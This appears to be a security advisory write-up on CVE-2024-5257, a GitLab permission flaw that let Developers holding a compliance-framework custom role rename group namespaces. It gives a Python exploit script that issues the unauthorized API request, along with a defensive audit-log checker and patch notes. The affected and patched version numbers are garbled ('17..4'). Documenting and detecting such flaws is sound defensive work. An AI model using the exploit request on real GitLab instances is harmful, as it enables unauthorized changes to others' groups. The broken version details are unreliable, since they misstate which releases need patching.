CVE-2024-5257 - Developer Users with `admin_compliance_framework` Custom Role Can Modify Group Namespace URLs in GitLab CE/EE (17. - 17..4, 17.1 - 17.1.2)
An issue with GitLab CE/EE (Community Edition/Enterprise Edition) has been identified where users with certain permissions can perform unauthorized operations. This vulnerability has been assigned the CVE identifier CVE-2024-5257.
Vulnerability Details
An issue was discovered in GitLab CE/EE where a Developer user with a custom role that includes the admin_compliance_framework permission may have been able to modify the URL for a group namespace. This issue arises from incorrect permission checks and impacts data integrity and potentially exposes sensitive information to unauthorized individuals.
Exploit Example
To demonstrate this exploit, consider a Developer user Alice with a custom role that has the admin_compliance_framework permission. If they are assigned to a project under the group namespace example-group, their permissions should not allow them to modify the URL of the group, but due to this vulnerability, they can.
Here is a code snippet showcasing the exploit:

```python
import requests

# GitLab instance URL and user access token
gitlab_url = "https://gitlab.example.com"
user_token = "Alice_user_token"

# Group (ID or URL-encoded path) whose URL should not be modifiable by this user
group_id = "example-group"

# Attempt to modify the group URL by changing its path
headers = {
    "Private-Token": user_token,
    "Content-Type": "application/json",
}
new_name = "modified-example-group"
data = {
    "path": new_name,
}

response = requests.put(f"{gitlab_url}/api/v4/groups/{group_id}", headers=headers, json=data)
print(response.status_code)
```
Under normal circumstances, the API request would return a 403 Forbidden status code, indicating that the user does not have permission to modify the group URL. However, when exploiting the CVE-2024-5257 vulnerability, the response will be a 200 OK status code, indicating that the operation was successful and the group URL is now modified.
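For defenders, the following added example (not from the original write-up or from GitLab) reviews exported audit records for group path changes made by anyone below Owner and marks those whose author fits the Developer plus `admin_compliance_framework` profile described above. The record layout, field names and sample data are constructed assumptions, not a documented GitLab export format.

```python
import json

# GitLab numeric access levels (Developer = 30, Owner = 50).
DEVELOPER, OWNER = 30, 50
PERMISSION = "admin_compliance_framework"

# Constructed sample data; field names are assumptions made for this example.
MEMBERS = {
    101: {"username": "alice", "access_level": 30, "custom_permissions": [PERMISSION]},
    102: {"username": "bob", "access_level": 50, "custom_permissions": []},
    103: {"username": "carol", "access_level": 30, "custom_permissions": []},
}
AUDIT_LINES = """\
{"author_id": 101, "entity_type": "Group", "change": "path", "from": "example-group", "to": "modified-example-group"}
{"author_id": 102, "entity_type": "Group", "change": "path", "from": "team-a", "to": "team-alpha"}
{"author_id": 103, "entity_type": "Group", "change": "visibility", "from": "private", "to": "internal"}
{"author_id": 999, "entity_type": "Group", "change": "path", "from": "ops", "to": "ops-old"}
not-json debris
"""


def flag_path_changes(audit_lines, members):
    """Return group path changes made by anyone who is not a group Owner."""
    findings = []
    for line in audit_lines.splitlines():
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed lines instead of aborting the review
        if not isinstance(event, dict):
            continue
        if event.get("entity_type") != "Group" or event.get("change") != "path":
            continue
        member = members.get(event.get("author_id"))
        if member and member["access_level"] >= OWNER:
            continue  # Owners are expected to be able to change a group's path
        findings.append({
            "author": member["username"] if member else f"unknown:{event.get('author_id')}",
            "from": event.get("from"),
            "to": event.get("to"),
            # True when the author matches the profile described for CVE-2024-5257
            "matches_cve_profile": bool(
                member and member["access_level"] == DEVELOPER
                and PERMISSION in member["custom_permissions"]),
        })
    return findings


if __name__ == "__main__":
    for finding in flag_path_changes(AUDIT_LINES, MEMBERS):
        print(finding)
```

Authors missing from the membership map are reported as well, since a path change by an unknown account deserves the same review.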
This issue was first reported in the GitLab issue tracker.
For more details, please refer to the issue on the official GitLab website:
- GitLab Issue #14053: Incorrect permission check for the namespace admin
GitLab has provided patches for the affected versions mentioned above:
- Upgrading to GitLab 17..4 (Release Notes)
- Upgrading to GitLab 17.1.2 (Release Notes)
Users are advised to upgrade their GitLab CE/EE installations to the respective patched versions immediately to address this vulnerability.
Timeline
Published on: 07/11/2024 07:15:04 UTC
Last modified on: 07/12/2024 16:54:34 UTC